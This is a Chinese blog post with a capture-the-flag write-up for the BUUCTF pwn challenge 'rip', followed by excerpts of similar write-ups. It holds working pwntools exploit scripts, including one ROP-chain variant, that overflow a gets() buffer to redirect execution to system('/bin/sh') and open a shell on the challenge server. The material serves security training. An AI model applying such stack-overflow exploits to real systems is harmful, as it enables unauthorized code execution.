BUUCTF pwn题 rip

原创 已于 2023-02-16 09:44:45 修改 · 355 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #python #系统安全 #网络攻击模型

于 2023-02-15 17:00:08 首次发布
文章详细介绍了如何通过file命令识别64位ELF可执行文件,使用checksec检查文件保护状态,发现无保护。接着在IDA_PRO中分析代码,发现main函数中的gets函数可能导致栈溢出。作者推断可以覆盖rip寄存器,利用栈溢出执行system(/bin/sh)来获取shell。计算了覆盖长度,构建了payload并通过远程连接或本地进程发送,最终实现交互式shell。

file命令查看文件类型

在这里插入图片描述
发现文件为64位elf可执行文件

checksec查看文件保护类型

在这里插入图片描述
发现并没有开启任何的保护

IDA_PRO查看

在这里插入图片描述
查看main函数发现危险函数gets推断为栈溢出漏洞

查看其余函数
在这里插入图片描述
直接得到思路,栈溢出覆盖rip,使返回地址变成fun函数的地址,执行systen(/bin/sh),getshell

在这里插入图片描述
计算覆盖位数,因为get内容为s所以此处应该为s位数15(0xf-0x0),加上rbp(栈底指针寄存器)大小8位,一共为23位

构建exp

from pwn import *
ghust = remote("node4.buuoj.cn",26246)
# ghust = process('./pwn1')
addr = 0x40118a
payload = b'A' * 15 + b'B'*8 + p64(addr)

# ghust.recvuntil('input')
ghust.sendline(payload)
ghust.interactive()
BUUCTF(Pwn) rip
半岛铁盒的博客
03-20 639
按tab键,看一下 fun函数 发现其地址是 0x401186; 但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行 from pwn import * p = remote('node3.buuoj.cn', '25677') payload = 'a' * (0xf + 8) + p64(0x40118A) p.sendline(payload) p.interactive() ...
BUUCTF_PWN - rip
weixin_46009088的博客
12-06 854
BUUCTF_PWN - rip 查看程序保护模式和文件基本信息: 没有什么保护,各条保护详情介绍请看胡写瞎写(1) pwntools常见命令,另外文件是64位小端程序 IDA载入 找到main函数F5: 发现一个 gets ( ) 函数,一个可以利用的漏洞点,gets ( ) 函数介绍: get( )函数简单易用,它读取从输入流中读取一行,赋给字符串变量s,直到遇到换行符,然后丢弃换行符,存储其余的字符,并在结尾添加一个空字符使其成为一个 C 字符串,但是它无法检查数组是否装的下,因此它只知道开始处,.
BUUCTF----rip过程
最新发布
2501_90908131的博客
10-14 366
这是一道关于栈溢出漏洞利用的CTF目。分析发现64位ELF程序无任何保护机制(CANARY/NX/PIE未开启),通过gets函数的栈溢出漏洞实现攻击。程序存在后门函数(地址40011a),采用ret2text技术覆盖返回地址控制执行流。计算得到偏移量为0xf+8,构造payload跳转到后门函数即可获取shell。成功执行后通过cat flag命令获取flag。文章还简要介绍了常见保护机制(NX/DEP、ASLR、Canary等)及其绕过方法,以及ret指令、shell等关键概念。这种栈溢出利用是Pwn
BUUCTFPwnrip步骤
2301_81505831的博客
01-25 1211
查看之后发现是64位的ELF文件,直接放入IDA64进行反编译。
BUUCTF pwn——rip
CNS-Enterprise BCC-1701-J
03-10 445
BUUCTF练习
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1409
BUUCTF——rip 目地址:https://buuoj.cn/challenges 目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
BUUCTF-PWN详解(nc&rip
2302_80325559的博客
11-25 1955
这是C语言调用gets函数的过程绿色的直到return都是main函数的栈帧,下面的当然是gets函数。PWN目涉及的知识太多了一篇文章讲不完,这次的知识都是恰好足以解决这两道目的,如果展开首先我也说不太清楚(菜鸡哭哭 (╥﹏╥)),其次新手也听的吃力。IDA已经告诉我们s距离ebp的位置(此时ebp指向%ebp in caller)我们要填充15(Fh的十进制是15)个垃圾数据到达ebp然后再填充8个垃圾数据(ebp占8个字节)之后的数据就到了我们的return中。那不就意味着我们获得了权限。
BUUCTF pwn rip
weixin_55190422的博客
11-03 494
现在开始是记录我个人对BUU上PWN的刷记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
buuctf PWN rip
wp568的博客
10-04 181
fun函数的地址是0x401186。下载pwn1 用IDA打开。
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1443
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
BUUCTF-Pwn-rip
餐桌上的猫
11-14 2995
目截图 使用IDA打开附件,反汇编为C语言找到两个函数 可以看到主函数中定义了一个字符类型的变量s(这里IDA出了点问,实际上应该是char s[15]),并使用gets()对其进行赋值,那么这里便存在栈溢出的漏洞,我们只需要想办法执行函数fun()就可以获得shell,进而获得flag,从IDA中可以看出定义s的大小为15个字节 所以到达到溢出的目标位置就需要填充15+8=23个字节,另外从IDA中可以看出fun()的起始地址为0x401186 所以我们可以构造payload=‘a’*23+
buuctf pwn-rip
2501_91264017的博客
07-31 351
看到他所在的地址 0x401162。接下来看输出的位置 即+008的地址。首先要注意的是输入的位置 即rdi的地址。换成十进制就是23,所以需要23个杂值。当然你还可以在ida直接看出来。可以看到我们的目标地址成功写入。下完断点就是执行,就输入r。注意,如果出现权限不够,输入。这里是0x17 这是16进制。接下来就是写脚本来获得权限。首先要有pwn所需的环境。双击main函数按F5。还需要一个工具IDA。这样就能够看到源代码。接下来分析C语言代码。
BUUCTF Pwn rip
weixin_41557838的博客
05-27 472
BUUCTF Pwn rip
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2933
初学pwn-writeUp BUUCTF平台的一道目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
BUUCTF - PWNrip
古月浪子的博客
03-19 1782
checksec一下,发现啥保护也没开 IDA打开看看,明显的栈溢出漏洞,IDA给出了s的长度为0xf 发现后门函数 脚本中使用地址0x401186发现不行(不知道为什么),换成0x401187发现可以 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.l...
[BUUCTF-PWN] rip
m0_46098032的博客
01-02 309
下载文件,checksec查看一下文件,64位文件,没有开启任何保护。 用IDA64位打开文件,反编译main函数,看到了gets函数,gets函数存在栈溢出漏洞。 双击s,可以看到现只需存入15个字节即可劫持函数返回地址。 我们同时可以看到存在一个fun函数。就是一个系统调用。 查看一下fun函数的地址,为0x401186 exp如下: from pwn import * p = remote('node4.buuoj.cn', :9228) payload = b.
[BUUCTF]PWN------rip
BangSen1的博客
01-13 413
rip 例行检查,无保护 运行一下,输出了我们输入的东西, 用64位IDA打开,看到了/bin/sh
BUUCTF (PWN) RIP详细分析
热门推荐
qy201706的博客
04-08 1万+
很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨; 由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~
pwn基础入门-buuctf-2.rip
weixin_49765221的博客
05-21 1637
将下载下来的pwn1文件内容,放到ubuntu中checksec一下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

G_BEST

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值